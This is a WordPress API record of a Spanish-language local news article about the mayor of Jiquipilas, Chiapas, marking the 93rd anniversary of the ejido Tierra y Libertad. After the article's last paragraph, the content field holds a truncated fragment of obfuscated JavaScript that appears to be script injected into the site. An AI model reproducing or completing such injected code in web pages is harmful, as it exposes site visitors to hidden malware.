{"id":7702,"date":"2022-12-29T04:39:30","date_gmt":"2022-12-29T04:39:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7702"},"modified":"2022-12-29T04:39:31","modified_gmt":"2022-12-29T04:39:31","slug":"hugo-lazaro-festejo-con-habitantes-del-ejido-tierra-y-libertad-el-93-aniversario-de-fundacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7702","title":{"rendered":"Hugo L\u00e1zaro festej\u00f3 con habitantes del ejido Tierra y Libertad el 93 aniversario de fundaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221228-WA0043.jpg\" alt=\"\" class=\"wp-image-7703\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221228-WA0043.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221228-WA0043-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221228-WA0043-768x512.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 A nombre del Gobierno Municipal les refrend\u00f3 el apoyo para que esta comunidad siga teniendo progreso.<br>\u2022 Les dese\u00f3 por adelantado un feliz a\u00f1o nuevo a las y los habitantes de la localidad<\/p>\n\n\n\n<p>Jiquipilas, Chiapas. \u2013 El Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez felicit\u00f3 a los habitantes del ejido Tierra y Libertad por festejar el 93 aniversario de fundaci\u00f3n de esta comunidad donde ha sido notorio el desarrollo social.<\/p>\n\n\n\n<p>En compa\u00f1\u00eda de su esposa Madely Montejo Maza y sus hijos, el Alcalde reconoci\u00f3 el trabajo de las autoridades de esta comunidad y el \u00edmpetu de trabajo responsable de los ejidatarios que les ha permitido sacar adelante los proyectos.<\/p>\n\n\n\n<p>Sostuvo que una comunidad que mantiene la uni\u00f3n y comparte los mismos objetivos, ve reflejado el progreso, y esto es un hecho en los 93 a\u00f1os que han transcurrido en el ejido Tierra y Libertad.<\/p>\n\n\n\n<p>Hugo L\u00e1zaro, junto a su familia participaron en el tradicional desfile de aniversario por las principales calles de la comunidad junto a los habitantes, a quienes se les refrend\u00f3 el compromiso del Ayuntamiento para que este ejido tenga mayor bienestar.<\/p>\n\n\n\n<p>Los habitantes estuvieron muy contentos con la visita de la primera autoridad municipal, a quien le agradecieron que siempre les ha brindado apoyo para que esta colonia sea de mayor progreso.<\/p>\n\n\n\n<p>Al final del desfile, se realiz\u00f3 un evento cultural con la participaci\u00f3n de varios grupos locales que alegraron aun m\u00e1s esta celebraci\u00f3n de aniversario.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 A nombre del Gobierno Municipal les refrend\u00f3 el apoyo para que esta comunidad siga teniendo progreso.\u2022 Les dese\u00f3 por adelantado un feliz a\u00f1o nuevo a las y los habitantes de la localidad Jiquipilas, Chiapas. \u2013 El Presidente Municipal C\u00e9sar Hugo L\u00e1zaro Rodr\u00edguez felicit\u00f3 a los habitantes del ejido Tierra y Libertad por festejar el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7703,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7702","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7702"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7702\/revisions"}],"predecessor-version":[{"id":7704,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7702\/revisions\/7704"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7703"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}